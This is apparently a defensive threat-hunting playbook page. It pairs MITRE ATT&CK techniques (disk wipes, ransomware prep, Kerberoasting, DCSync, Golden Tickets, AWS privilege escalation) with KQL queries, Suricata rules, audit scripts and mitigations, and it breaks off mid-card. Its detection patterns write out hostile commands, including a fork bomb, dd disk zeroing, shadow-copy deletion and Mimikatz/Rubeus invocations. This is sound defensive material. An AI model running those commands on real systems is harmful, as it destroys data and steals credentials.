Adversaries modify web content or internal intranet pages to spread propaganda, cause embarrassment, demonstrate access, or intimidate the organization โ€” often replacing the home page with a political or extortion message.
KQLUnexpected modification of web root files by non-deployment processes
event.category: "file" AND event.action: ("modification" OR "creation") AND file.path: ("*\\inetpub\\wwwroot\\*" OR "*\\var\\www\\html\\*") AND NOT process.name: ("w3wp.exe" OR "httpd" OR "nginx")
KQLWeb shell or script drop in web-accessible directory
event.category: "file" AND event.action: "creation" AND file.path: ("*\\wwwroot\\*" OR "*\\public_html\\*") AND file.extension: ("php" OR "asp" OR "aspx" OR "jsp" OR "html")
T1561

Disk Wipe

[MITRE]
Adversaries wipe the Master Boot Record (MBR) or entire disk structure of the compromised system โ€” instantly bricking the machine and preventing the OS from booting. Used by nation-state wipers like NotPetya and HermeticWiper.
KQLRaw disk access โ€” indicator of MBR overwrite (Sysmon Event ID 9)
winlog.event_id: 9 AND winlog.event_data.Device: "\\Device\\HarddiskVolume*" AND process.executable: ("*\\Temp\\*" OR "*\\AppData\\*")
KQLLinux dd command writing zeroes to block device (MBR/disk wipe)
process.name: "dd" AND process.command_line: ("*if=/dev/zero*" OR "*if=/dev/urandom*") AND process.command_line: "*of=/dev/sd*"
T1499

Endpoint Denial of Service

[MITRE]
Adversaries crash or exhaust the resources (CPU, Memory, Disk) of a specific endpoint or server by exploiting a vulnerability that triggers a BSOD, or by running fork bomb scripts that consume all available memory.
KQLLinux fork bomb execution โ€” bash script spawning endless copies of itself
process.name: ("bash" OR "sh") AND process.command_line: ":(){ :|:& };:"
KQLExtreme process creation rate from a single parent โ€” resource exhaustion indicator
event.category: "process" AND event.type: "start" | stats count by process.parent.name | where count > 1000
T1657

Financial Theft

[MITRE]
Adversaries conduct financial fraud as the primary goal โ€” Business Email Compromise (BEC) rerouting wire transfers, unauthorized ACH/SWIFT transactions, or cryptocurrency theft from exchange wallets or hot wallets on compromised hosts.
KQLO365 mail forwarding rules created to send finance emails to external addresses
event.dataset: "o365.audit" AND event.action: ("New-InboxRule" OR "Set-InboxRule") AND winlog.event_data.Parameters: ("*ForwardTo*" OR "*RedirectTo*") AND winlog.event_data.Parameters: ("*@gmail.com*" OR "*@protonmail*")
KQLCryptocurrency wallet software or exchange access from enterprise endpoints
process.name: ("bitcoin-qt.exe" OR "electrum.exe" OR "exodus.exe") OR destination.domain: ("*binance.com*" OR "*coinbase.com*" OR "*kraken.com*")
T1495

Firmware Corruption

[MITRE]
Adversaries overwrite or corrupt device firmware (UEFI/BIOS, network device firmware, SSD controller firmware) to permanently brick hardware or create a bootkit that survives OS reinstalls โ€” making full recovery effectively impossible.
KQLUnsigned drivers or tools accessing UEFI/firmware storage regions
process.name: ("fwupdate.exe" OR "flashrom" OR "chipsec_main.py") AND NOT process.code_signature.trusted: true
KQLUEFI variable modification via SetVariable โ€” only legitimate during firmware updates
winlog.event_id: 13 AND registry.path: "*\\HARDWARE\\UEFI\\*" AND NOT process.name: ("MoSetup.exe" OR "setupact.exe")
T1490

Inhibit System Recovery

[MITRE]
Before ransomware or wiper execution, adversaries delete Volume Shadow Copies, backup catalogs, and disable Windows Recovery Environment โ€” ensuring IT cannot roll back the server to restore data without paying the ransom.
KQLThe ransomware pre-execution trinity โ€” deleting backups and disabling recovery
process.name: ("vssadmin.exe" OR "bcdedit.exe" OR "wbadmin.exe" OR "wmic.exe") AND process.command_line: ("*delete shadows*" OR "*recoveryenabled No*" OR "*delete catalog*" OR "*shadowcopy delete*")
T1496

Resource Hijacking

[MITRE]
Cryptomining. Adversaries compromise servers and cloud infrastructure solely to steal CPU/GPU for mining Monero (XMRig, xmr-stak), costing the organization thousands in cloud bills and degrading service performance without destroying data.
KQLCommon cryptominer execution โ€” process name or Stratum pool arguments
process.name: ("xmrig" OR "minerd" OR "cgminer" OR "xmr-stak") OR process.command_line: ("*--donate-level*" OR "*-o stratum+tcp://*" OR "*pool.minexmr.com*")
ArkimeStratum mining protocol in unencrypted traffic (JSON-RPC over raw TCP)
protocols == tcp && tcp.payload contains "mining.subscribe"
T1489

Service Stop

[MITRE]
Adversaries stop AV services to evade detection, or stop business services (Exchange, SQL Server) to release file locks so ransomware can encrypt the .mdf/.edb database files that would otherwise be locked by the running service.
KQLCommands stopping critical enterprise services โ€” often preceding ransomware encryption
process.name: ("net.exe" OR "sc.exe" OR "taskkill.exe") AND process.command_line: ("* stop msexchange*" OR "* stop mssql*" OR "* stop veeam*" OR "* /im sqlservr.exe*")
Dashboards / IDS Rules
Kibana dashboard widgets, Elastic Lens configuration notes, visualization mockups, and Suricata IDS rules organized by related MITRE ATT&CK tactic.
Kibana Dashboards IDS Rules
Kibana Dashboards Initial Access 3 Execution 2 Persistence 2 Defense Evasion 4 Credential Access 1 Discovery 3 Lateral Movement 2 Command & Control 1 Exfiltration 1 Impact 1
IDS Rules Initial Access 2 Execution 1 Discovery 1 Lateral Movement 1 Command & Control 1 Exfiltration 1

Kibana Dashboard Widgets 20 widgets

Each card contains the KQL query, Elastic Lens configuration table, and a mockup preview of the visualization. Build these in Kibana: Dashboards -> Create Visualization -> Paste KQL -> Configure Lens as shown.

Initial Access3 item(s)
Execution2 item(s)
Persistence2 item(s)
Defense Evasion4 item(s)
Credential Access1 item(s)
Discovery3 item(s)
Lateral Movement2 item(s)
Command & Control1 item(s)
Exfiltration1 item(s)
Impact1 item(s)

Suricata IDS Rules 7 rules

Deploy these rules in /etc/suricata/rules/ or paste into your custom rule file. Each card includes the raw rule and a plain-English breakdown.

Initial Access2 item(s)
Execution1 item(s)
Discovery1 item(s)
Lateral Movement1 item(s)
Command & Control1 item(s)
Exfiltration1 item(s)

Deployment Notes: Dashboard widgets -> Kibana: Dashboard -> Create Visualization -> Lens. Suricata rules -> /etc/suricata/rules/local.rules -> suricata-update -> systemctl restart suricata
SIDs 1000010-1000016 reserved for this playbook supplement. Increment if you have conflicts with existing local rules.

DoD PowerShell Tools
Host hunt scripts from the DoD SAFE bundle, organized by analyst workflow. Notes and support files that live with a script are kept inside that script card.
WorkflowsActive Directory Monitoring 4Host Collection & Inventory 9Network & Remote Host Checks 6Persistence & Autoruns 9Credential & Lateral Movement Hunts 7Filesystem & Hiding Places 6Response Actions 3Utilities & Support 5
Active Directory Monitoring4 tool(s)
Host Collection & Inventory9 tool(s)
Network & Remote Host Checks6 tool(s)
Persistence & Autoruns9 tool(s)
Credential & Lateral Movement Hunts7 tool(s)
Filesystem & Hiding Places6 tool(s)
Response Actions3 tool(s)
Utilities & Support5 tool(s)

๐Ÿ” Identity Attacks 8 cards

The most consequential techniques in modern intrusions. Every major ransomware engagement, APT campaign, and insider threat ultimately runs through identity. Includes Kerberoasting, AS-REP Roasting, DCSync, Golden/Silver Tickets, ADCS abuse (ESC1-15), NTLM Relay, and Pass-the-Hash. Each card has detection queries, why it matters, what to look for, mitigations, and the tools attackers use.

T1558.003

Kerberoasting

HIGH [MITRE]

Summary: Request service tickets (TGS) for accounts with SPNs, then crack them offline. Attackers target service accounts because they often have weak passwords that never change.

Why this matters

Domain service accounts (SQL, IIS app pools, legacy apps) frequently have weak passwords set years ago and never rotated. Because any authenticated domain user can request a TGS for any SPN, attackers harvest a pile of encrypted tickets and brute-force them offline with hashcat mode 13100.

What to look for

Event 4769 where TicketEncryptionType is 0x17 (RC4-HMAC) โ€” modern systems prefer AES. Attackers explicitly request RC4 because it's weaker. Look for bursts of TGS requests from a single user within a short timeframe, requests for non-existent services, or user accounts (not machine accounts ending in $) being targeted.

KQL Kerberoasting indicator โ€” RC4 ticket for user account (not ending in $) 
event.code:4769 and winlog.event_data.TicketEncryptionType:"0x17" and winlog.event_data.TicketOptions:"0x40810000" and not winlog.event_data.ServiceName:*$
KQL (burst detection) Same user requesting 10+ different SPNs in 5 minutes 
event.code:4769 and winlog.event_data.TicketEncryptionType:"0x17"
-- Aggregate: group by user.name, count unique winlog.event_data.ServiceName over 5min
-- Alert when count > 10
PowerShell (hunt) Enumerate domain accounts with SPNs (review candidates attackers might target) 
Get-ADUser -Filter {ServicePrincipalName -like "*"} -Properties ServicePrincipalName, PasswordLastSet, Enabled |
    Where-Object {$_.Enabled -eq $true} |
    Select-Object Name, SamAccountName, PasswordLastSet, ServicePrincipalName |
    Sort PasswordLastSet

๐Ÿ›ก๏ธ Mitigations

  • Use AES-only Kerberos (disable RC4 via Group Policy: Network Security: Configure encryption types allowed for Kerberos)
  • Use Managed Service Accounts (MSAs/gMSAs) โ€” passwords auto-rotate, 240-character random
  • Enforce 25+ character passwords on all SPN-holding accounts
  • Enable Event 4769 auditing on all Domain Controllers
  • Monitor for SPNs on privileged accounts (Domain Admins should have NO SPNs)

๐Ÿ”ง Tools used by attackers / defenders

RubeusImpacket GetUserSPNs.pyPowerView Invoke-Kerberoasthashcat -m 13100
T1558.004

AS-REP Roasting

HIGH [MITRE]

Summary: Exploits accounts with 'Do not require Kerberos preauthentication' enabled โ€” request an AS-REP message containing encrypted material that can be cracked offline.

Why this matters

By default, Kerberos pre-authentication requires proving knowledge of a password before the DC returns any encrypted material. Some legacy accounts have pre-auth disabled (via the DONT_REQ_PREAUTH flag). For those accounts, anyone can request an AS-REP and receive a blob encrypted with the user's password hash โ€” crackable offline (hashcat mode 18200).

What to look for

Event 4768 where PreAuthType is 0 (meaning no pre-auth required) and TicketEncryptionType is RC4. Also hunt for users with UserAccountControl flag 4194304 (DONT_REQ_PREAUTH) set.

KQL AS-REP request with no pre-authentication โ€” extremely rare legitimate use 
event.code:4768 and winlog.event_data.PreAuthType:"0" and winlog.event_data.TicketEncryptionType:"0x17"
PowerShell (audit) Find all AS-REP-roastable accounts in your domain 
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth, PasswordLastSet |
    Where-Object {$_.Enabled -eq $true} |
    Select Name, SamAccountName, PasswordLastSet

๐Ÿ›ก๏ธ Mitigations

  • Disable 'Do not require Kerberos preauthentication' on ALL accounts โ€” no modern app should need this
  • If a legacy app requires it, enforce 25+ character passwords on that account specifically
  • Alert on any user being granted DONT_REQ_PREAUTH (Event 4738 with UAC flag changes)

๐Ÿ”ง Tools used by attackers / defenders

Rubeus asreproastImpacket GetNPUsers.pyhashcat -m 18200
T1003.006

DCSync

CRITICAL [MITRE]

Summary: Use the Directory Replication Service (DRS) protocol to request password hashes for any account, including krbtgt, without executing code on a DC. Game-over if successful.

Why this matters

DCSync abuses the normal AD replication process. Any account with Replicating Directory Changes + Replicating Directory Changes All + Replicating Directory Changes in Filtered Set rights can request replication data โ€” which includes password hashes. Domain Admins, Enterprise Admins, and the DCs themselves have these rights. Attackers add these rights to a compromised account, then dump everything including krbtgt (enabling Golden Ticket attacks).

What to look for

Event 4662 with Properties GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes) and 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes-All), from a non-DC host. Also hunt for permission changes granting these rights via Event 5136.

KQL DCSync replication request from non-DC host 
event.code:4662 and winlog.event_data.Properties:(*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*) and not user.name:(*$ or MSOL_* or AAD_*)
KQL ACL modification granting replication rights (attacker setup step) 
event.code:5136 and winlog.event_data.AttributeLDAPDisplayName:"nTSecurityDescriptor" and winlog.event_data.AttributeValue:*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*
PowerShell (audit) Find all accounts with DCSync rights currently granted 
$Domain = Get-ADDomain
$DN = $Domain.DistinguishedName
(Get-Acl "AD:$DN").Access |
    Where-Object {$_.ObjectType -in "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"} |
    Select IdentityReference, ActiveDirectoryRights

๐Ÿ›ก๏ธ Mitigations

  • Audit replication permissions monthly โ€” only DCs and Entra Connect should have them
  • Alert immediately on any ACL change to the domain root granting replication rights
  • Rotate krbtgt twice (7-day wait between) if DCSync is suspected
  • Implement Tier 0 isolation โ€” Domain Admins should never touch user workstations

๐Ÿ”ง Tools used by attackers / defenders

Mimikatz lsadump::dcsyncImpacket secretsdump.pyDSInternals Get-ADReplAccount
T1558.001

Golden Ticket Attack

CRITICAL [MITRE]

Summary: Forge a Kerberos TGT using the krbtgt account's password hash โ€” grants domain-wide access that survives password changes for everyone except krbtgt itself.

Why this matters

The krbtgt account signs every TGT issued in a domain. If an attacker obtains its NTLM hash (typically via DCSync), they can forge TGTs for ANY user including non-existent ones, with ANY group memberships, valid for up to 10 years by default. This is the ultimate persistence โ€” invisible to password resets, MFA, account disables, and most detection stacks.

What to look for

TGTs with anomalous lifetimes (default is 10 hours, forged ones often use 10 years). Kerberos authentications for accounts that don't exist in AD. Event 4624 with strange LogonGuid values. Look for mismatches where a TGT references a user but the DC has no record of issuing that TGT.

KQL Anomalous TGT lifetime โ€” forged tickets often have non-default expirations 
event.code:4768
-- Compute ticket lifetime from EndTime - StartTime
-- Alert on lifetime > 24 hours (default max is 10h)
KQL Kerberos authentication for non-existent account 
event.code:4624 and winlog.event_data.AuthenticationPackageName:"Kerberos"
-- Correlate user.name against current AD user list
-- Alert on user not present in AD
PowerShell (defensive) Check krbtgt password age โ€” if never rotated or very old, consider domain compromised 
Get-ADUser "krbtgt" -Properties PasswordLastSet, whenChanged | Select Name, PasswordLastSet, whenChanged

๐Ÿ›ก๏ธ Mitigations

  • Rotate krbtgt password every 180 days (rotate twice with 10-hour wait between)
  • If compromise suspected, rotate krbtgt twice immediately (7-day wait between to allow existing TGTs to expire naturally โ€” shorter forces re-auth storm)
  • Monitor for TGTs with lifetimes exceeding domain policy
  • Deploy DC-side logging: Event 4769 with unusual fields, Event 4624 on domain-joined hosts

๐Ÿ”ง Tools used by attackers / defenders

Mimikatz kerberos::goldenRubeus goldenImpacket ticketer.py
T1558.002

Silver Ticket Attack

HIGH [MITRE]

Summary: Forge a service ticket (TGS) using a service account's hash โ€” grants access to one specific service but bypasses the DC entirely.

Why this matters

Unlike Golden Tickets (which require krbtgt), Silver Tickets only need the hash of the target service account. They're harder to detect because they don't generate Domain Controller logs โ€” the forged TGS is presented directly to the target service. Useful for sustained access to specific high-value services (SQL Server, Exchange, SharePoint) even after other access is revoked.

What to look for

Silver Tickets deliberately avoid DC logs, so you must look at the service side. Event 4624 on the target member server with no corresponding Event 4768/4769 on any DC. PAC validation failures when the target service checks the ticket with a DC.

KQL Kerberos logon on member server with no DC-side TGS issuance 
event.code:4624 and winlog.event_data.AuthenticationPackageName:"Kerberos" and not host.role:"domain_controller"
-- Correlate against 4769 on all DCs
-- Alert when no matching 4769 exists for the logon
KQL PAC validation failure โ€” can indicate ticket forgery 
event.code:(4769 or 40960 or 40961)

๐Ÿ›ก๏ธ Mitigations

  • Rotate service account passwords regularly (90 days minimum)
  • Use gMSAs for all service accounts where possible
  • Enable PAC validation on target services (PacRequestorEnforcement registry setting)
  • Correlate Kerberos logons against DC-side ticket issuance โ€” missing TGS is a red flag

๐Ÿ”ง Tools used by attackers / defenders

Mimikatz kerberos::golden /service:<spn>Rubeus silverImpacket ticketer.py
T1649

ADCS Abuse (ESC1โ€“ESC15)

CRITICAL [MITRE]

Summary: Exploit Active Directory Certificate Services misconfigurations (cataloged as ESC1 through ESC15 by SpecterOps) to obtain certificates that grant domain privileges.

Why this matters

ADCS is massively underestimated. Misconfigured certificate templates let low-privilege users request certificates that authenticate as Domain Admin. The ESC1โ€“ESC15 framework from SpecterOps catalogs 15+ distinct attack paths โ€” ESC1 alone (template allows requester to supply subject) is present in probably 30%+ of enterprise ADCS deployments. Once abused, it's 100% domain takeover with an extremely low forensic footprint.

What to look for

Event 4886 (Certificate Services received request) and 4887 (approved) with unusual requesters or templates. Certificate requests where SubjectAltName contains a Domain Admin UPN. Templates with ENROLLEE_SUPPLIES_SUBJECT (msPKI-Certificate-Name-Flag = 1) combined with CLIENT_AUTH EKU.

KQL Certificate issued with SubjectAltName containing admin account โ€” classic ESC1/ESC6 
event.code:4887 and (winlog.event_data.SubjectAltName:*administrator* or winlog.event_data.SubjectAltName:*krbtgt* or winlog.event_data.SubjectAltName:*DomainAdmins*)
KQL Certificate authentication (PKINIT) โ€” correlate against certificate issuance logs 
event.code:4768 and winlog.event_data.CertIssuerName:*
-- Hunt for PKINIT authentications by high-privilege accounts from unusual hosts
PowerShell (audit) Run Certify/Certipy to identify vulnerable templates (attacker perspective) 
# Install Certify (offensive) or PSPKIAudit (defensive)
# Certify.exe find /vulnerable
# Or use PSPKIAudit:
# Import-Module PSPKIAudit
# Invoke-PKIAudit

๐Ÿ›ก๏ธ Mitigations

  • Audit ALL certificate templates โ€” run Certify or PSPKIAudit immediately
  • Remove CLIENT_AUTH EKU from templates that allow ENROLLEE_SUPPLIES_SUBJECT
  • Require manager approval on sensitive templates
  • Disable NTLM/Kerberos authentication to the CA (ESC8 mitigation)
  • Apply KB5014754 โ€” Strong Mapping (May 2022 patch, enforced May 2023)
  • Monitor Event 4886/4887 for unusual SAN contents

๐Ÿ”ง Tools used by attackers / defenders

Certipy (Python)Certify (C#)PSPKIAudit (defensive)SpecterOps whitepaper: Certified Pre-Owned
T1557.001

NTLM Relay

HIGH [MITRE]

Summary: Capture NTLM authentication attempts and relay them to another service where the victim has privileges โ€” auth without ever cracking the hash.

Why this matters

NTLM (especially NTLMv1 and NTLMv2 without SMB signing) is fundamentally relay-vulnerable. An attacker forces a victim to authenticate to them (via LLMNR/mDNS poisoning, WPAD, or coerced auth like PetitPotam / PrinterBug), then relays that auth to a third service like LDAP or SMB where they become the victim. Tools like ntlmrelayx and ADCS ESC8 (NTLMโ†’HTTP relay to the CA) make this trivially exploitable.

What to look for

Logons from unusual sources, authentications using NTLM where Kerberos is expected, spikes in LLMNR/NBT-NS traffic from attacker-controlled hosts, coerced authentication patterns (MS-RPRN EfsRpcOpenFileRaw calls to unusual sources).

KQL NTLMv1 or downgrade โ€” should be essentially zero in modern environments 
event.code:4624 and winlog.event_data.AuthenticationPackageName:"NTLM" and winlog.event_data.LmPackageName:"NTLM V1"
KQL PetitPotam / coerced authentication patterns 
event.code:5145 and winlog.event_data.ShareName:"\\\\*\\IPC$" and winlog.event_data.RelativeTargetName:("lsarpc" or "efsrpc" or "samr" or "netlogon")
Suricata Responder LLMNR poisoning signature 
alert udp any 5355 -> any any (msg:"LLMNR Response - Potential Poisoning";
    content:"|84 00 00 01 00 01|";
    classtype:attempted-recon; sid:9100001; rev:1;)

๐Ÿ›ก๏ธ Mitigations

  • Disable NTLMv1 (GPO: Network Security: LAN Manager authentication level = Send NTLMv2 only)
  • Disable LLMNR and NetBIOS over TCP/IP
  • Enable SMB signing and LDAP signing domain-wide
  • Enable Extended Protection for Authentication (EPA) on HTTP services (mitigates ESC8)
  • Apply MS-DFSNM and MS-RPRN patches (PetitPotam / PrinterBug)
  • Monitor for RPC calls to EfsRpcOpenFileRaw, MS-DFSNM, MS-RPRN from non-admin hosts

๐Ÿ”ง Tools used by attackers / defenders

Impacket ntlmrelayx.pyResponderPetitPotamPrinterBugInveigh
T1550.002 / .003

Pass-the-Hash / Pass-the-Ticket

HIGH [MITRE]

Summary: Use a stolen NTLM hash (PtH) or Kerberos ticket (PtT) to authenticate without ever knowing the plaintext password.

Why this matters

Windows authentication was designed to accept either the password or the hash โ€” that's how SSO works internally. Once an attacker has the hash (via LSASS dump, SAM dump, DCSync), they can authenticate to anything that accepts NTLM. PtT works similarly with Kerberos tickets exported from memory. Neither requires cracking; both bypass MFA when MFA is layered on top of NTLM/Kerberos rather than integrated.

What to look for

Network logons (Type 3) where LogonProcessName is NtLmSsp and the user is a high-privilege account. Events showing Kerberos authentications without a corresponding TGS request on the DC. Events 4624 with LogonGuid of all zeros (classic PtH indicator). Same account authenticating from multiple sources simultaneously.

KQL Classic Pass-the-Hash indicator โ€” LogonGuid all zeros with NTLM 
event.code:4624 and winlog.event_data.LogonType:3 and winlog.event_data.AuthenticationPackageName:"NTLM" and winlog.event_data.LogonGuid:"{00000000-0000-0000-0000-000000000000}"
KQL Privileged account using NTLM instead of Kerberos โ€” unusual in modern domains 
event.code:4624 and winlog.event_data.LogonType:3 and winlog.event_data.AuthenticationPackageName:"NTLM" and user.name:(*admin* or *svc_*)
KQL Same account logon from 2+ source IPs within 5 minutes 
event.code:4624
-- Aggregate by user.name
-- Count distinct source.ip over 5min window
-- Alert when distinct count >= 2

๐Ÿ›ก๏ธ Mitigations

  • Enable Credential Guard on all Windows 10+/Server 2016+ systems
  • Enforce Tier 0/1/2 model โ€” Domain Admin credentials NEVER touch Tier 1 or Tier 2 hosts
  • Disable NTLM where possible (NTLM Auditing โ†’ NTLM Block)
  • LAPS for local admin passwords โ€” unique per host means stolen hash only reusable on origin host
  • Enable Protected Users group for privileged accounts (forces Kerberos, no cached creds, no NTLM)

๐Ÿ”ง Tools used by attackers / defenders

Mimikatz sekurlsa::pthImpacket psexec.py/wmiexec.py -hashesCrackMapExecRubeus ptt

โ˜๏ธ AWS CloudTrail 6 cards

Cloud detection patterns built on CloudTrail logs. Covers IAM enumeration, access key anomalies, IAM privilege escalation paths (Rhino Security cataloged 20+), S3 data exfiltration, EC2 IMDS abuse (the Capital One vector), and cross-account AssumeRole abuse. Critical for any role with cleared cloud responsibilities or commercial AWS exposure.

T1087.004

AWS IAM Enumeration

MEDIUM [MITRE]

Summary: Attackers enumerate IAM users, roles, and policies to find privilege escalation paths and high-value targets. Low-risk from the AWS API perspective but diagnostic of intent.

Why this matters

Once an attacker has any AWS credentials โ€” from a leaked access key, SSRF on EC2 metadata, or a compromised developer laptop โ€” the first move is mapping out the account. What roles exist? What policies do I have? What buckets? Can I assume something more privileged? This shows up as a burst of read-only 'List*' and 'Get*' IAM calls.

What to look for

CloudTrail events with rapid-fire `ListUsers`, `ListRoles`, `ListPolicies`, `GetAccountAuthorizationDetails`, `ListAccessKeys` within a short window from a single identity. Especially suspicious from EC2 instance roles or Lambda execution roles.

KQL (Elastic CloudTrail) Burst of IAM enumeration calls from a single identity 
event.dataset:"aws.cloudtrail" and event.action:(ListUsers or ListRoles or ListPolicies or ListAccessKeys or ListGroupsForUser or GetAccountAuthorizationDetails)
-- Aggregate by user.name over 5-min windows
-- Alert when distinct event.action count >= 5
KQL GetAccountAuthorizationDetails โ€” single call returns everything, attacker favorite 
event.dataset:"aws.cloudtrail" and event.action:"GetAccountAuthorizationDetails" and not user.name:(*terraform* or *pulumi* or *aws-admin*)
AWS CLI (audit) CloudTrail Lake query to find the noisiest IAM enumerators in last 30 days 
aws cloudtrail start-query --query-statement "
  SELECT userIdentity.arn, count(*) as n
  FROM $EDS_ID
  WHERE eventSource = 'iam.amazonaws.com'
    AND eventName LIKE 'List%' OR eventName LIKE 'Get%'
    AND eventTime > timestamp '2026-03-25'
  GROUP BY userIdentity.arn
  ORDER BY n DESC"

๐Ÿ›ก๏ธ Mitigations

  • Deploy GuardDuty (finding: Discovery:IAMUser/AnomalousBehavior)
  • Use IAM Access Analyzer โ€” identify overly-permissive roles being enumerated
  • Least privilege: services shouldn't have iam:List* unless required
  • Alert on GetAccountAuthorizationDetails from any non-automation identity

๐Ÿ”ง Tools used by attackers / defenders

PacuScoutSuiteCloudSploitaws-iam-recon
T1078.004

AWS Access Key Anomalies

HIGH [MITRE]

Summary: Detect stolen AWS access keys being used from unusual locations, during unusual hours, or for unusual services.

Why this matters

AWS access keys leak constantly โ€” GitHub commits, Slack messages, laptop theft, dev container images. Once leaked, attackers immediately test them from their own infrastructure. An access key normally used from a corporate IP in US-East suddenly calling STS from Eastern Europe is the classic leak signal. Also watch for keys used in services the owner never uses (e.g., developer key suddenly calling EC2 RunInstances).

What to look for

`sourceIPAddress` for an access key that differs from its historical baseline. New user-agent strings (especially 'aws-cli' or 'boto3' when the owner always uses the console). Activity outside business hours. Calls to EC2, Lambda, or IAM when the key historically only touched S3 and DynamoDB.

KQL Access key used from country not seen before for that key 
event.dataset:"aws.cloudtrail" and user.id:"AKIA*"
-- Join against historical source.geo.country_iso_code per access key
-- Alert when new country observed
KQL Console login followed by CLI activity within minutes (key theft pattern) 
event.dataset:"aws.cloudtrail" and event.action:"ConsoleLogin"
-- Correlate with same userIdentity using AWS CLI user-agent within 5min
KQL IAM key activity from TOR exit nodes or known VPN providers 
event.dataset:"aws.cloudtrail" and source.ip:*
-- Enrich source.ip with threat intel (TOR, abuse ASNs)
-- Alert on match

๐Ÿ›ก๏ธ Mitigations

  • Enforce MFA on all IAM users (including programmatic access via AWS CLI --serial-number)
  • Rotate access keys every 90 days minimum
  • Use IAM Identity Center (SSO) + role assumption instead of long-lived keys
  • Scan GitHub, Slack, and internal wikis for leaked AKIA* / ASIA* strings (TruffleHog, git-secrets)
  • Use AWS Config rule: access-keys-rotated

๐Ÿ”ง Tools used by attackers / defenders

TruffleHoggit-secretsAWS CloudTrail LakeGuardDuty UnauthorizedAccess:IAMUser/*
T1078.004

AWS Privilege Escalation

CRITICAL [MITRE]

Summary: Rhino Security's 'AWS IAM Privilege Escalation' paper catalogs 20+ methods. Highest-fidelity detections: AttachUserPolicy, CreateLoginProfile, UpdateAssumeRolePolicy, PutUserPolicy.

Why this matters

AWS has dozens of IAM actions that effectively grant admin. If an attacker can call AttachUserPolicy with policy arn:aws:iam::aws:policy/AdministratorAccess, they immediately become admin. Same for CreatePolicyVersion with --set-as-default, or UpdateAssumeRolePolicy to add themselves as a principal to a high-privilege role. These events are rare in normal ops but common in attacks.

What to look for

CloudTrail `AttachUserPolicy`, `AttachRolePolicy`, `PutUserPolicy`, `PutRolePolicy`, `CreatePolicyVersion`, `CreateLoginProfile`, `UpdateLoginProfile`, `UpdateAssumeRolePolicy`, `CreateAccessKey` on another user. Especially suspicious when the action grants `*` or `iam:*` permissions.

KQL Any AttachUserPolicy/AttachRolePolicy granting AdministratorAccess 
event.dataset:"aws.cloudtrail" and event.action:(AttachUserPolicy or AttachRolePolicy) and aws.cloudtrail.request_parameters:*AdministratorAccess*
KQL Creation of login profile on existing user (password added โ€” backdoor setup) 
event.dataset:"aws.cloudtrail" and event.action:"CreateLoginProfile"
KQL CreateAccessKey on a user OTHER than the caller (backdoor persistence) 
event.dataset:"aws.cloudtrail" and event.action:"CreateAccessKey" and user.name!=aws.cloudtrail.request_parameters.userName
KQL UpdateAssumeRolePolicy โ€” attacker adding self to a trust policy 
event.dataset:"aws.cloudtrail" and event.action:"UpdateAssumeRolePolicy"

๐Ÿ›ก๏ธ Mitigations

  • SCPs (Service Control Policies) at org level โ€” deny iam:AttachUserPolicy to anyone except the IAM admin role
  • Use permissions boundaries โ€” prevent self-elevation even if someone has iam:AttachUserPolicy
  • Alert on ALL writes to IAM policies, login profiles, and trust relationships
  • Implement just-in-time IAM access via tools like ConsoleMe / AWS Identity Center

๐Ÿ”ง Tools used by attackers / defenders

Pacu (iam__privesc_scan module)PMapperCloudsplaining
T1530

AWS S3 Data Exfiltration

HIGH [MITRE]

Summary: Attackers bulk-download S3 buckets, modify bucket policies for public exposure, or copy data cross-account.

Why this matters

S3 holds the data. Exfiltration happens three ways: (1) bulk GetObject calls to download everything, (2) modify bucket policy to allow '*' (public) and then download externally without auth, (3) cross-account replication to an attacker-controlled bucket. All three show in CloudTrail as specific event patterns.

What to look for

Spikes in `GetObject` API calls from single identity (S3 data events must be enabled โ€” off by default). `PutBucketPolicy` granting `Principal: '*'`. `PutBucketAcl` setting public-read or public-read-write. `PutBucketReplication` with cross-account destination. Unusual User-Agent like `s3cmd` or `rclone` from production workload identities.

KQL Bucket made public via policy change 
event.dataset:"aws.cloudtrail" and event.action:"PutBucketPolicy" and aws.cloudtrail.request_parameters:*"Principal\":\"*\""*
KQL Cross-account replication configured โ€” data flowing to attacker account 
event.dataset:"aws.cloudtrail" and event.action:"PutBucketReplication"
-- Validate destination bucket is in an account on the organization allow-list
KQL GetObject burst โ€” requires S3 data events enabled in CloudTrail 
event.dataset:"aws.cloudtrail" and event.action:"GetObject"
-- Aggregate: count by user.name over 5min
-- Alert when count > 1000 (tune per baseline)

๐Ÿ›ก๏ธ Mitigations

  • Enable S3 Block Public Access at org level (IGNORE_PUBLIC_ACLS + RESTRICT_PUBLIC_BUCKETS)
  • Enable CloudTrail S3 data events on all sensitive buckets
  • Use S3 Access Analyzer โ€” identifies buckets inadvertently made public
  • GuardDuty S3 protection โ€” detects anomalous GetObject, suspicious IPs, TOR
  • Macie scanning for sensitive data in S3 โ€” know what matters before attackers do

๐Ÿ”ง Tools used by attackers / defenders

Pacu (s3__download_bucket)awscli s3 syncrclones3cmd
T1552.005

EC2 Instance Metadata Service Abuse (IMDSv1 SSRF)

CRITICAL [MITRE]

Summary: SSRF vulnerabilities in EC2-hosted apps + IMDSv1 = attacker steals instance IAM credentials via http://169.254.169.254/latest/meta-data/iam/security-credentials/.

Why this matters

The 2019 Capital One breach (100M records) was exactly this: Paige Thompson found an SSRF in a misconfigured WAF on an EC2 instance, used it to hit the metadata service, stole the instance role credentials, and used them to dump S3. IMDSv2 (token-based) fixes this but requires migration. ANY EC2 instance still on IMDSv1 is one SSRF vulnerability away from being a pivot point.

What to look for

CloudTrail events with `userIdentity.sessionContext.sessionIssuer.type = Role` and `sessionContext.attributes.mfaAuthenticated = false`, where the source IP is NOT the instance's IP (credentials used off-instance). `userAgent` strings indicating tools like Pacu or CLI when they should be from the application.

KQL Instance role credentials used from IP that's not the instance itself 
event.dataset:"aws.cloudtrail" and user.roles:*EC2* and user.id:ASIA*
-- Correlate source.ip against known EC2 private/public IPs
-- Alert when source.ip is external
KQL Instance role used to call IAM or Organizations (lateral/privesc indicator) 
